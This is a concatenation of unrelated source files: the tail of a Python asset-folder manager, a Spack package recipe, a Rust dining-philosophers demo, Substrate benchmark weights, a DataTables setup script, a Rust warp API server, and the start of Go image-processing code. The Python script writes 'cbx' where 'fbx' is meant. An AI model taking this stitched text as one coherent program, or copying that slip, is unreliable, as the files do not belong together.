+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
+ os.sep
+ f
)
else: # we had a double name, so mark it as double
placement_log["existing_full"].append(
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
+ os.sep
+ f
)
placement_log["existing"].append(f)
# generating report
files = os.listdir(global_data["local_path"] + os.sep + global_data["source_path"])
placement_log["missing"] = list(set(files) - set(placement_log["existing"]))
file = open(
append_date(global_data["local_path"] + os.sep + "FileTransferReport.txt"),
"w",
encoding="utf-8",
)
file.write(f'Moved files({len(placement_log["moved"])}): \n')
file.write("\n")
for f in placement_log["moved"]:
file.write(f + "\n")
file.write("\n")
file.write(f'Existed files({len(placement_log["existing_full"])}): \n')
file.write("\n")
for f in placement_log["existing_full"]:
file.write(f + "\n")
file.write("\n")
file.write(f'Missing locations for files({len(placement_log["missing"])}): \n')
file.write("\n")
for f in placement_log["missing"]:
file.write(f + "\n")
file.close()
input("Press any enter to close...")
def generate_detail_report(database):
console.print("Generating detail report ...")
asset_types = database.get_all_asset_types()
placement_log = {"have": [], "missing": [], "need": []}
for a in asset_types: # track(asset_types, description="Types."):
categories = database.get_all_categories_by_asset_type_id(a["id"])
if not os.path.exists(global_data["local_path"] + os.sep + a["name"]):
continue
for c in categories: # track(categories, description="Categories."):
assets = database.get_all_assets_by_category(c["id"])
if not os.path.exists(
global_data["local_path"] + os.sep + a["name"] + os.sep + c["name"]
):
continue
console.print(f"{a['name']} - {c['name']}")
for asset in track(assets, description="Assets.", total=len(assets)):
if os.path.exists(
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
):
local_path = (
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
+ os.sep
)
count = 0
have = 0
missing = ""
if asset["format_sbsar"]:
count = count + 1
if asset["have_format_sbsar"]:
have = have + 1
else:
missing = missing + "sbsar "
changed_record = True
if asset["format_sbs"]:
count = count + 1
if asset["have_format_sbs"]:
have = have + 1
else:
missing = missing + "sbs "
if asset["format_exr"]:
count = count + 1
if asset["have_format_exr"]:
have = have + 1
else:
missing = missing + "exr "
if asset["format_fbx"]:
count = count + 1
if asset["have_format_fbx"]:
have = have + 1
else:
missing = missing + "fbx "
if asset["format_glb"]:
count = count + 1
if asset["have_format_glb"]:
have = have + 1
else:
missing = missing + "glb "
if asset["format_mdl"]:
count = count + 1
if asset["have_format_mdl"]:
have = have + 1
else:
missing = missing + "mdl "
if count == have:
placement_log["have"].append(
a["name"] + " > " + c["name"] + " > " + asset["name"]
)
elif count != have and have > 0:
placement_log["missing"].append(
a["name"]
+ " > "
+ c["name"]
+ " > "
+ asset["name"]
+ " : missing formats "
+ missing
)
else:
placement_log["need"].append(
a["name"] + " > " + c["name"] + " > " + asset["name"]
)
file = open(
append_date(global_data["local_path"] + os.sep + "AssetDetailsCountReport.txt"),
"w",
encoding="utf-8",
)
file.write(f'Have assets({len(placement_log["have"])}): \n')
file.write("\n")
for f in placement_log["have"]:
file.write(f + "\n")
file.write("\n")
file.write(f'Missing assets({len(placement_log["missing"])}): \n')
file.write("\n")
for f in placement_log["missing"]:
file.write(f + "\n")
file.write("\n")
file.write(f'Needed assets({len(placement_log["need"])}): \n')
file.write("\n")
for f in placement_log["need"]:
file.write(f + "\n")
file.close()
input("Press any enter to close...")
def generate_folder_report(database):
console.print("Generating folder report ...")
asset_types = database.get_all_asset_types()
placement_log = []
for a in asset_types: # track(asset_types, description="Types."):
categories = database.get_all_categories_by_asset_type_id(a["id"])
# if not os.path.exists(global_data["local_path"] + os.sep + a["name"]):
# continue
for c in categories: # track(categories, description="Categories."):
assets = database.get_all_assets_by_category(c["id"])
# if not os.path.exists(
# global_data["local_path"] + os.sep + a["name"] + os.sep + c["name"]
# ):
# continue
console.print(f"{a['name']} - {c['name']}")
have = 0
missing = 0
for asset in track(assets, description="Assets.", total=len(assets)):
if os.path.exists(
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
):
have = have + 1
else:
missing = missing + 1
placement_log.append(f"{a['name']} - {c['name']} (Have {have}; Missing {missing})")
file = open(
append_date(global_data["local_path"] + os.sep + "AssetFolderCountReport.txt"),
"w",
encoding="utf-8",
)
for f in placement_log:
file.write(f + "\n")
file.close()
input("Press any enter to close...")
def mark_database_with_my_files(database):
console.print("Checking local files for the database ...")
asset_types = database.get_all_asset_types()
for a in asset_types: # track(asset_types, description="Types."):
categories = database.get_all_categories_by_asset_type_id(a["id"])
if not os.path.exists(global_data["local_path"] + os.sep + a["name"]):
continue
for c in categories: # track(categories, description="Categories."):
assets = database.get_all_assets_by_category(c["id"])
if not os.path.exists(
global_data["local_path"] + os.sep + a["name"] + os.sep + c["name"]
):
continue
console.print(f"{a['name']} - {c['name']}")
for asset in track(assets, description="Assets.", total=len(assets)):
if os.path.exists(
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
):
local_path = (
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
+ os.sep
)
all_files = []
for lp, currentDirectory, files in os.walk(local_path):
all_files.extend(files)
asset["have_format_sbsar"] = False
asset["have_format_sbs"] = False
asset["have_format_exr"] = False
asset["have_format_fbx"] = False
asset["have_format_glb"] = False
asset["have_format_mdl"] = False
for file in all_files:
if file.lower().endswith(".sbsar") and asset["format_sbsar"]:
asset["have_format_sbsar"] = True
if file.lower().endswith(".sbs") and asset["format_sbs"]:
asset["have_format_sbs"] = True
if file.lower().endswith(".exr") and asset["format_exr"]:
asset["have_format_exr"] = True
if file.lower().endswith(".fbx") and asset["format_fbx"]:
asset["have_format_fbx"] = True
if file.lower().endswith(".glb") and asset["format_glb"]:
asset["have_format_glb"] = True
if file.lower().endswith(".mdl") and asset["format_mdl"]:
asset["have_format_mdl"] = True
database.update_asset(asset)
input("Press any enter to close...")
def fancy_list_generation(database):
console.print("Generating request list ...")
fancy_requests = []
if os.path.exists(global_data["local_path"] + os.sep + "Requests.txt"):
with open(global_data["local_path"] + os.sep + "Requests.txt") as f:
base_requests = f.read().splitlines()
for base_r in track(
base_requests, description="Requests.", total=len(base_requests)
):
asset = database.get_asset_by_name(base_r)
if len(asset) > 0:
asset_format = ""
if asset[0]["format_sbsar"]:
asset_format = asset_format + "sbsar "
if asset[0]["format_sbs"]:
asset_format = asset_format + "sbs "
if asset[0]["format_exr"]:
asset_format = asset_format + "exr "
if asset[0]["format_fbx"]:
asset_format = asset_format + "cbx "
if asset[0]["format_glb"]:
asset_format = asset_format + "glb "
if asset[0]["format_mdl"]:
asset_format = asset_format + "mdl "
fancy_requests.append(
asset[0]["name"]
+ " - "
+ asset_format.strip()
+ " - "
+ asset[0]["url"]
)
if len(fancy_requests) > 0:
file = open(
append_date(global_data["local_path"] + os.sep + "Result.txt"),
"w",
encoding="utf-8",
)
for f in fancy_requests:
file.write(f + "\n")
file.close()
input("Press any enter to close...")
def move_folders_to_new_category(database):
"""
    Checks whether an asset folder is missing from its expected category location, then searches
    every category for that asset and relocates it to the proper location
:param CommonDatabaseAccess database: reference to the database
"""
console.print("Generating report ...")
asset_types = database.get_all_asset_types()
all_categories = database.get_all_categories()
log = []
for a in asset_types: # track(asset_types, description="Types."):
categories = database.get_all_categories_by_asset_type_id(a["id"])
# if not os.path.exists(global_data["local_path"] + os.sep + a["name"]):
# continue
for c in categories: # track(categories, description="Categories."):
assets = database.get_all_assets_by_category(c["id"])
# if not os.path.exists(
# global_data["local_path"] + os.sep + a["name"] + os.sep + c["name"]
# ):
# continue
console.print(f"{a['name']} - {c['name']}")
for asset in track(assets, description="Assets.", total=len(assets)):
expected_path = (
global_data["local_path"]
+ os.sep
+ a["name"]
+ os.sep
+ c["name"]
+ os.sep
+ asset["name"]
)
if not os.path.exists(expected_path):
# we did not find our asset in the right place, so we check everywhere
found = False
for a1 in asset_types:
for c1 in all_categories:
checked_path = (
global_data["local_path"]
+ os.sep
+ a1["name"]
+ os.sep
+ c1["name"]
+ os.sep
+ asset["name"]
)
if checked_path != expected_path and os.path.exists(
checked_path
):
log.append(checked_path + " >> " + expected_path)
if not os.path.exists(global_data["local_path"] + os.sep + a["name"]):
os.makedirs(global_data["local_path"] + os.sep + a["name"])
if not os.path.exists(
global_data["local_path"] + os.sep + a["name"] + os.sep + c["name"]
):
os.makedirs(
global_data["local_path"] + os.sep + a["name"] + os.sep + c["name"]
)
os.rename(checked_path, expected_path)
found = True
break
if found:
break
console.print("Moved Assets - " + str(len(log)))
console.print()
console.print("All Done !!!")
if len(log) > 0:
file = open(
append_date(
global_data["local_path"] + os.sep + "AssetCategoryChangeLog.txt"
),
"w",
encoding="utf-8",
)
for f in log:
file.write(f + "\n")
file.close()
input("Press any enter to close...")
def main_menu(database):
"""
Draw main menu
:param CommonDatabaseAccess database: reference to the database
:return:
"""
menu_title = " Select action"
menu_items = [
"[1] Create folders.",
"[2] Download all images.",
"[3] Make all icons. Where Preview.ico do not exist.",
"[4] Make all icons, but ignore where Preview.ico exists.",
"[5] Transfer all local files from _source folder to appropriate folders.",
"[6] Mark database with my files. (Do this before Generating report).",
"[7] Generate all folder report. (Do this after Marking database with my files).",
"[8] Generate existing folder report. (Do this after Marking database with my files).",
"[9] Fancy list generation. (Convert simple material list to list with format and links, looks for Requests.txt).",
"[10] Move folders if Category changed.",
"[11] Quit.",
]
menu_exit = False
while not menu_exit:
clear_console()
console.print("version " + global_data["version"])
console.print(menu_title + "")
for m_i in menu_items:
console.print(m_i + "")
console.print("")
user_input = input("Enter a number: ")
if user_input.isnumeric():
menu_sel = int(user_input)
if menu_sel == 1: # Create folders
create_folders(database)
if menu_sel == 2: # Download all images
download_all_images(database)
if menu_sel == 3: # Make all icons
make_all_icons(database, False)
if menu_sel == 4: # Make all icons
make_all_icons(database)
if menu_sel == 5: # Transfer all local files
transfer_all_local_files(database)
if menu_sel == 6: # Mark database with my files
mark_database_with_my_files(database)
if menu_sel == 7: # Generate folder report
generate_folder_report(database)
if menu_sel == 8: # Generate detail report
generate_detail_report(database)
if menu_sel == 9: # Fancy list generation
fancy_list_generation(database)
if menu_sel == 10: # Move folders to new category
move_folders_to_new_category(database)
if menu_sel == 11: # Quit
menu_exit = True
def main():
"""
    Locates the database file(s) next to the application, lets the user pick one if needed, and then opens the main menu
:return:
"""
menu_title = " Select database file"
menu_items = []
menu_items_count = 0
menu_items_references = []
local_path = os.path.dirname(sys.argv[0])
global_data["local_path"] = local_path
global_data["source_path"] = "_source"
files = os.listdir(local_path)
for f in files:
file_details = os.path.splitext(f)
if os.path.isfile(local_path + os.sep + f) and file_details[1] == ".db":
menu_items.append(f"[{menu_items_count + 1}] {f}")
menu_items_count = menu_items_count + 1
menu_items_references.append(f)
if menu_items_count == 0:
clear_console()
console.print("Database files not found next to the application files.")
input("Press any enter to close...")
elif menu_items_count == 1:
database = CommonDatabaseAccess(
db_path=local_path + os.sep + menu_items_references[0], force=False
)
main_menu(database)
else:
menu_exit = False
while not menu_exit:
clear_console()
console.print("version " + global_data["version"])
console.print(menu_title + "")
for m_i in menu_items:
console.print(m_i + "")
console.print("")
user_input = input("Enter a number: ")
if user_input.isnumeric():
menu_sel = int(user_input)
if 0 < menu_sel <= len(menu_items_references): # Initial scan
database = CommonDatabaseAccess(
db_path=local_path
+ os.sep
+ menu_items_references[menu_sel - 1],
force=False,
)
main_menu(database)
menu_exit = True
if __name__ == "__main__":
    main()
package.py | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PrinseqLite(Package):
"""PRINSEQ will help you to preprocess your genomic or metagenomic
sequence data in FASTA or FASTQ format."""
homepage = "http://prinseq.sourceforge.net"
url = "https://sourceforge.net/projects/prinseq/files/standalone/prinseq-lite-0.20.4.tar.gz"
version('0.20.4', sha256='9b5e0dce3b7f02f09e1cc7e8a2dd77c0b133e5e35529d570ee901f53ebfeb56f')
variant('nopca', default=True, description="Graphs version without PCA")
depends_on('perl', type='run')
depends_on('perl-cairo', type='run')
    depends_on('perl-digest-md5', type='run')
    depends_on('perl-json', type='run')
def install(self, spec, prefix):
mkdirp(prefix.bin)
filter_file(r'#!/usr/bin/perl',
'#!/usr/bin/env perl',
'prinseq-graphs-noPCA.pl')
filter_file(r'#!/usr/bin/perl',
'#!/usr/bin/env perl',
'prinseq-lite.pl')
install('prinseq-graphs-noPCA.pl', prefix.bin)
install('prinseq-lite.pl', prefix.bin)
chmod = which('chmod')
chmod('+x', join_path(self.prefix.bin, 'prinseq-graphs-noPCA.pl'))
chmod('+x', join_path(self.prefix.bin, 'prinseq-lite.pl')) | |
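# Typical usage sketch (assuming a working Spack installation):
#   spack install prinseq-lite        # builds the default +nopca variant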
main.rs | use std::thread;
use std::sync::{Mutex, Arc};
use std::time::Duration;
use rand::{self, Rng};
// struct representing a table with several forks
struct Table {
forks: Vec<Mutex<()>>,
}
// struct representing the philosophers
struct Philosopher {
    name: String,
    // usize: the type used to index vectors (Table.forks)
left: usize,
right: usize,
}
// implementation of the Philosopher struct
impl Philosopher {
    // new function: the usual convention for constructing instances
fn new(name: &str, left: usize, right: usize) -> Philosopher {
Philosopher {
name: name.to_string(),
left: left,
right: right,
}
}
fn eat(&self, table: &Table) {
loop {
let mut rng = rand::thread_rng();
            // Judith Butler picks up the right fork and then the left (in this sequence)
if self.name == "Judith Butler" {
println!("{} is THINKING.", self.name);
                // simulate the time the philosopher spends thinking
let die = rng.gen_range(1, 1000);
thread::sleep(Duration::from_millis(die));
println!("{} is HUNGRY.", self.name);
                // the philosopher tries to pick up the forks
let _left = table.forks[self.right].lock().unwrap();
let _right = table.forks[self.left].lock().unwrap();
println!("{} is EATING.", self.name);
                // simulate the time the philosopher spends eating
let die = rng.gen_range(1, 1000);
thread::sleep(Duration::from_millis(die));
println!("{} is DONE EATING.", self.name);
            // the other philosophers pick up the left fork and then the right (in this sequence)
} else {
println!("{} is THINKING.", self.name);
                // simulate the time the philosopher spends thinking
let die = rng.gen_range(1, 1000);
thread::sleep(Duration::from_millis(die));
println!("{} is HUNGRY.", self.name);
                // the philosopher tries to pick up the forks
let _left = table.forks[self.left].lock().unwrap();
let _right = table.forks[self.right].lock().unwrap();
println!("{} is EATING.", self.name);
                // simulate the time the philosopher spends eating
let die = rng.gen_range(1, 1000);
thread::sleep(Duration::from_millis(die));
println!("{} is DONE EATING.", self.name);
}
}
}
}
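// Note: making a single philosopher (Judith Butler) acquire her forks in the
// opposite order breaks the circular-wait condition, which is what keeps this
// classic dining-philosophers setup from deadlocking.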
fn main() {
    // ARC: atomic reference count: used to share the table between multiple threads
    // Mutex: a way to control concurrent access
let table = Arc::new(Table { forks: vec![
Mutex::new(()),
Mutex::new(()),
Mutex::new(()),
Mutex::new(()),
Mutex::new(()),
]});
    // create the philosophers with their respective names and fork indices
let philosophers = vec![
Philosopher::new("Judith Butler", 0, 1),
Philosopher::new("Gilles Deleuze", 1, 2),
Philosopher::new("Karl Marx", 2, 3),
Philosopher::new("John Locke", 3, 4),
Philosopher::new("Michel Foucault", 0, 4),
];
    // handles of the spawned threads
    // into_iter(): creates an iterator that takes ownership of each philosopher
let handles: Vec<_> = philosophers.into_iter().map( |philosopher| {
let table = table.clone();
        // spawn the threads
thread::spawn(move || {
philosopher.eat(&table);
})
        // collection of the handles returned by thread::spawn
}).collect();
    // join() each handle returned by the threads
for handle in handles {
handle.join().unwrap();
}
}
weights.rs | // Copyright 2022 Webb Technologies Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
//! Autogenerated weights for `pallet_dkg_proposal_handler`
//!
//! THIS FILE WAS AUTO-GENERATED USING THE SUBSTRATE BENCHMARK CLI VERSION 4.0.0-dev
//! DATE: 2022-03-16, STEPS: `50`, REPEAT: 10, LOW RANGE: `[]`, HIGH RANGE: `[]`
//! EXECUTION: Some(Wasm), WASM-EXECUTION: Compiled, CHAIN: Some("dev"), DB CACHE: 1024
// Executed Command:
// ./target/release/dkg-standalone-node
// benchmark
// --chain
// dev
// --execution
// wasm
// --wasm-execution
// compiled
// --pallet
// pallet-dkg-proposal-handler
// --extrinsic
// *
// --steps
// 50
// --repeat
// 10
// --json
// --output
// ./pallets/dkg-proposal-handler/src/weights.rs
#![cfg_attr(rustfmt, rustfmt_skip)]
#![allow(unused_parens)]
#![allow(unused_imports)]
use frame_support::{traits::Get, weights::Weight};
use sp_std::marker::PhantomData;
pub trait WeightInfo {
fn submit_signed_proposals(n: u32) -> Weight;
fn force_submit_unsigned_proposal() -> Weight;
}
/// Weight functions for `pallet_dkg_proposal_handler`.
pub struct WebbWeight<T>(PhantomData<T>);
impl<T: frame_system::Config> WeightInfo for WebbWeight<T> {
// Storage: DKG DKGPublicKey (r:1 w:0)
// Storage: DKGProposalHandler UnsignedProposalQueue (r:2 w:2)
// Storage: DKGProposalHandler SignedProposals (r:0 w:2)
fn submit_signed_proposals(n: u32, ) -> Weight {
(0_u64)
// Standard Error: 397_000
.saturating_add((296_117_000_u64).saturating_mul(n as Weight))
.saturating_add(T::DbWeight::get().reads(1_u64))
.saturating_add(T::DbWeight::get().reads((1_u64).saturating_mul(n as Weight)))
.saturating_add(T::DbWeight::get().writes((2_u64).saturating_mul(n as Weight)))
}
// Storage: DKGProposalHandler UnsignedProposalQueue (r:0 w:1)
fn force_submit_unsigned_proposal() -> Weight {
(2_000_000_u64)
.saturating_add(T::DbWeight::get().writes(1_u64))
}
}
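// A minimal wiring sketch (assumed, following the usual Substrate convention of a
// `WeightInfo` associated type on the pallet's `Config`):
//
// impl pallet_dkg_proposal_handler::Config for Runtime {
//     type WeightInfo = WebbWeight<Runtime>;
//     /* ...other associated types... */
// }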
impl WeightInfo for () {
	fn submit_signed_proposals(_n: u32, ) -> Weight {
		0
	}
fn force_submit_unsigned_proposal() -> Weight {
0
}
}
custom.js | "use strict";
$(document).ready(function(){
$('#auto-fill').DataTable( {
autoFill: true
} );
$('#keytable').DataTable( {
keys: true,
autoFill: true
} );
$('#column-selector').DataTable( {
columnDefs: [ {
orderable: false,
className: 'select-checkbox',
targets: 0
} ],
select: {
style: 'os',
selector: 'td:first-child'
},
order: [[ 1, 'asc' ]],
autoFill: {
columns: ':not(:first-child)'
}
} );
var table = $('#scrolling-datatable').dataTable( {
scrollY: 400,
scrollX: true,
scrollCollapse: true,
paging: false,
autoFill: true
} );
var table = $('#basic-row-reorder').DataTable( {
rowReorder: true
} );
//full row selection
var table = $('#full-row').DataTable( {
rowReorder: {
selector: 'tr'
},
columnDefs: [
{ targets: 0, visible: false }
]
} );
// Restricted column ordering
var table = $('#rest-column').DataTable( {
rowReorder: true,
columnDefs: [
{ orderable: true, className: 'reorder', targets: 0 },
{ orderable: false, targets: '_all' }
]
    } );
    $('#export-button').DataTable( {
        dom: 'Bfrtip',
buttons: [
'copyHtml5',
'excelHtml5',
'csvHtml5',
'pdfHtml5'
]
} );
$('#column-selector').DataTable( {
dom: 'Bfrtip',
buttons: [
{
extend: 'copyHtml5',
exportOptions: {
columns: [ 0, ':visible' ]
}
},
{
extend: 'excelHtml5',
exportOptions: {
columns: ':visible'
}
},
{
extend: 'pdfHtml5',
exportOptions: {
columns: [ 0, 1, 2, 5 ]
}
},
'colvis'
]
} );
$('#excel-cust-bolder').DataTable( {
dom: 'Bfrtip',
buttons: [ {
extend: 'excelHtml5',
customize: function ( xlsx ){
var sheet = xlsx.xl.worksheets['sheet1.xml'];
// jQuery selector to add a border
$('row c[r*="10"]', sheet).attr( 's', '25' );
}
} ]
} );
$('#cust-json').DataTable( {
dom: 'Bfrtip',
buttons: [
{
text: 'JSON',
action: function ( e, dt, button, config ) {
var data = dt.buttons.exportData();
$.fn.dataTable.fileSave(
new Blob( [ JSON.stringify( data ) ] ),
'Export.json'
);
}
}
]
} );
$('#basic-key-table').DataTable( {
keys: true
} );
var table = $('#scrolling').DataTable( {
scrollY: 300,
paging: false,
keys: true
} );
$('#focus-cell').DataTable( {
keys: true
} );
$('#basic-scroller').DataTable( {
ajax: "../assets/json/datatable-extension/data.txt",
deferRender: true,
scrollY: 200,
scrollCollapse: true,
scroller: true
} );
$('#state-saving').DataTable( {
ajax: "../assets/json/datatable-extension/data.txt",
deferRender: true,
scrollY: 200,
scrollCollapse: true,
scroller: true,
stateSave: true
} );
$('#api').DataTable( {
ajax: "../assets/json/datatable-extension/data.txt",
deferRender: true,
scrollY: 200,
scrollCollapse: true,
scroller: true,
initComplete: function () {
this.api().row( 1000 ).scrollTo();
}
} );
$('#responsive').DataTable( {
responsive: true
} );
var table = $('#new-cons').DataTable();
// new $.fn.dataTable.Responsive( table );
$('#show-hidden-row').DataTable( {
responsive: {
details: {
display: $.fn.dataTable.Responsive.display.childRowImmediate,
type: ''
}
}
} );
$('#basic-colreorder').DataTable( {
colReorder: true
} );
$('#state-saving').dataTable( {
colReorder: true,
stateSave: true
} );
$('#real-time').dataTable( {
colReorder: {
realtime: false
}
} );
$('#custom-button').DataTable( {
dom: 'Bfrtip',
buttons: [
{
text: 'Add to cart',
action: function ( e, dt, node, config ) {
alert( 'Button activated' );
}
}
]
} );
$('#class-button').DataTable( {
dom: 'Bfrtip',
buttons: [
{
text: 'Secondary',
className: 'btn-secondary'
},
{
text: 'Success',
className: 'btn-success'
},
{
text: 'Danger',
className: 'btn-danger'
}
]
} );
$('#keyboard-btn').DataTable( {
dom: 'Bfrtip',
buttons: [
{
text: 'Button <u>1</u>',
key: '1',
action: function ( e, dt, node, config ) {
alert( 'Button 1 activated' );
}
},
{
text: 'Button <u><i>shift</i> 2</u>',
key: {
shiftKey: true,
key: '2'
},
action: function ( e, dt, node, config ) {
alert( 'Button 2 activated' );
}
}
]
} );
$('#multilevel-btn').DataTable( {
dom: 'Bfrtip',
buttons: [
{
extend: 'collection',
text: 'Table control',
buttons: [
{
text: 'Toggle start date',
action: function ( e, dt, node, config ) {
dt.column( -2 ).visible( ! dt.column( -2 ).visible() );
}
},
{
text: 'Toggle salary',
action: function ( e, dt, node, config ) {
dt.column( -1 ).visible( ! dt.column( -1 ).visible() );
}
},
'colvis'
]
}
]
} );
$('#pagelength-btn').DataTable( {
dom: 'Bfrtip',
lengthMenu: [
[ 10, 25, 50, -1 ],
[ '10 rows', '25 rows', '50 rows', 'Show all' ]
],
buttons: [
'pageLength'
]
} );
$('#basic-fixed-header').DataTable( {
fixedHeader: true
} );
var table = $('#fixed-header-footer').DataTable( {
fixedHeader: {
header: true,
footer: true
}
} );
});
api_server.rs | use crate::chain::Coordinate;
use crate::config::Config;
use crate::monitor::{MonitorEvent, State};
use crate::node::Status;
use futures::{SinkExt, StreamExt};
use serde::Serialize;
use std::net::SocketAddr;
use std::sync::Arc;
use warp::filters::ws::Message;
use warp::Filter;
#[derive(Serialize)]
struct NodeResponse {
id: Option<u64>,
head: Option<Coordinate>,
version: Option<String>,
execution_client: Option<String>,
healthy: bool,
syncing: bool,
}
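// Example of the serialized form returned by `/api/v1/nodes` (values are
// illustrative only):
// [{"id":1,"head":null,"version":"lighthouse/v2.1.1","execution_client":null,
//   "healthy":true,"syncing":false}]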
#[derive(Serialize, Clone)]
struct NetworkConfigResponse {
network_name: String,
seconds_per_slot: u64,
genesis_time: u64,
slots_per_epoch: u64,
}
impl From<&Config> for NetworkConfigResponse {
fn from(config: &Config) -> Self {
Self {
network_name: config.network.name.clone(),
seconds_per_slot: config.consensus_chain.seconds_per_slot,
genesis_time: config.consensus_chain.genesis_time,
slots_per_epoch: config.consensus_chain.slots_per_epoch,
}
}
}
pub struct APIServer {
state: Arc<State>,
}
macro_rules! get {
($path:literal, $handler:ident, $state:ident) => {
warp::get()
.and(warp::path($path))
.and(warp::path::end())
.and(with_state($state.clone()))
.and_then($handler)
};
}
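// For reference, `get!("nodes", get_nodes, state)` expands roughly to:
//
// warp::get()
//     .and(warp::path("nodes"))
//     .and(warp::path::end())
//     .and(with_state(state.clone()))
//     .and_then(get_nodes)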
impl APIServer {
pub fn new(state: Arc<State>) -> Self {
Self { state }
}
pub async fn run(&self, addr: impl Into<SocketAddr>) {
let state = self.state.clone();
let network_config = get!("network-config", serve_network_config, state);
let nodes = get!("nodes", get_nodes, state);
// let chain = get!("chain", get_chain_data, state);
// // let fork_choice = get!("fork-choice", get_fork_choice, state);
// let participation = get!("participation", serve_participation_data, state);
// let deposit_contract = get!("deposit-contract", serve_deposit_contract_data, state);
// let weak_subjectivity = get!("weak-subjectivity", serve_weak_subjectivity_data, state);
let connect = warp::path("connect")
.and(with_state(state.clone()))
.and(warp::ws())
.map(|state: Arc<State>, ws: warp::ws::Ws| {
let mut rx = state.events_tx.subscribe();
ws.on_upgrade(|mut socket| async move {
loop {
tokio::select! {
result = rx.recv() => {
match result {
Ok(event) => {
match event {
head @ MonitorEvent::NewHead { .. } => {
match serde_json::to_string(&head) {
Ok(msg) => {
let msg = Message::text(msg);
match socket.send(msg).await {
Ok(_) => {}
Err(err) => log::warn!(
"error sending ws message to client: {:?}",
err
),
}
}
Err(err) => {
log::warn!("error serializing head update: {:?}", err);
}
}
}
}
}
Err(err) => {
log::warn!("error receiving update: {:?}", err);
}
}
}
msg = socket.next() => {
match msg {
Some(Ok(msg)) => {
if msg.is_close() {
log::debug!("ws client disconnecting");
break;
}
}
Some(Err(err)) => {
log::warn!("error receiving ws message from client: {:?}", err);
break;
}
None => break,
}
}
}
}
})
});
let api = warp::get()
.and(warp::path("api"))
.and(warp::path("v1"))
.and(
network_config
.or(nodes)
.or(connect)
// .or(chain)
// .or(fork_choice)
// .or(participation)
// .or(deposit_contract)
// .or(weak_subjectivity),
);
let html_dir = state.config.monitor.output_dir.clone();
let app = warp::get().and(warp::any()).and(warp::fs::dir(html_dir));
let routes = api.or(app);
warp::serve(routes).run(addr).await
}
}
fn with_state(
state: Arc<State>,
) -> impl Filter<Extract = (Arc<State>,), Error = std::convert::Infallible> + Clone {
warp::any().map(move || state.clone())
}
async fn get_nodes(state: Arc<State>) -> Result<impl warp::Reply, warp::Rejection> {
let nodes = state
.nodes
.iter()
.map(|node| {
let node = node.state.lock().expect("can read");
NodeResponse {
id: node.id,
head: node.head,
version: node.version.clone(),
execution_client: node.execution_description.clone(),
healthy: matches!(node.status, Status::Healthy | Status::Syncing),
syncing: matches!(node.status, Status::Syncing),
}
})
.collect::<Vec<_>>();
Ok(warp::reply::json(&nodes))
}
async fn serve_network_config(state: Arc<State>) -> Result<impl warp::Reply, warp::Rejection> {
let network_config: NetworkConfigResponse = (&state.config).into();
Ok(warp::reply::json(&network_config))
}
// async fn get_chain_data(state: Arc<State>) -> Result<impl warp::Reply, warp::Rejection> {
// // let status = state.chain.get_status();
// let status: FinalityData = Default::default();
// Ok(warp::reply::json(&status))
// }
// async fn get_fork_choice(state: Arc<State>) -> Result<impl warp::Reply, warp::Rejection> {
// let state = state.lock().expect("can read state");
// let tree = state.fork_choice.tree.read().expect("has data");
// Ok(warp::reply::json(&*tree))
// }
// async fn serve_participation_data(_state: Arc<State>) -> Result<impl warp::Reply, warp::Rejection> {
// let response: Vec<String> = vec![];
// Ok(warp::reply::json(&response))
// }
// async fn serve_deposit_contract_data(
// _state: Arc<State>,
// ) -> Result<impl warp::Reply, warp::Rejection> {
// Ok(warp::reply::json(&"todo"))
// }
// async fn serve_weak_subjectivity_data(
// _state: Arc<State>,
// ) -> Result<impl warp::Reply, warp::Rejection> {
// Ok(warp::reply::json(&"todo"))
// } | |
process.go | package main
import (
"bytes"
"context"
"fmt"
"math"
"runtime"
"github.com/imgproxy/imgproxy/v2/imagemeta"
)
const (
msgSmartCropNotSupported = "Smart crop is not supported by used version of libvips"
// https://chromium.googlesource.com/webm/libwebp/+/refs/heads/master/src/webp/encode.h#529
webpMaxDimension = 16383.0
)
var errConvertingNonSvgToSvg = newError(422, "Converting non-SVG images to SVG is not supported", "Converting non-SVG images to SVG is not supported")
func imageTypeLoadSupport(imgtype imageType) bool {
return imgtype == imageTypeSVG ||
imgtype == imageTypeICO ||
vipsTypeSupportLoad[imgtype]
}
func imageTypeSaveSupport(imgtype imageType) bool {
return imgtype == imageTypeSVG || vipsTypeSupportSave[imgtype]
}
func imageTypeGoodForWeb(imgtype imageType) bool {
return imgtype != imageTypeTIFF &&
imgtype != imageTypeBMP
}
func canSwitchFormat(src, dst, want imageType) bool {
return imageTypeSaveSupport(want) &&
(!vipsSupportAnimation(src) ||
(dst != imageTypeUnknown && !vipsSupportAnimation(dst)) ||
vipsSupportAnimation(want))
}
func extractMeta(img *vipsImage, baseAngle int, useOrientation bool) (int, int, int, bool) {
width := img.Width()
height := img.Height()
angle := 0
flip := false
if useOrientation {
orientation := img.Orientation()
if orientation == 3 || orientation == 4 {
angle = 180
}
if orientation == 5 || orientation == 6 {
angle = 90
}
if orientation == 7 || orientation == 8 {
angle = 270
}
if orientation == 2 || orientation == 4 || orientation == 5 || orientation == 7 {
flip = true
}
}
if (angle+baseAngle)%180 != 0 {
width, height = height, width
}
return width, height, angle, flip
}
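// For example, with useOrientation set, a 4000x3000 JPEG carrying EXIF orientation 6
// (rotate 90° clockwise) yields angle=90, flip=false, and the reported dimensions
// swap to 3000x4000.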
func calcScale(width, height int, po *processingOptions, imgtype imageType) float64 {
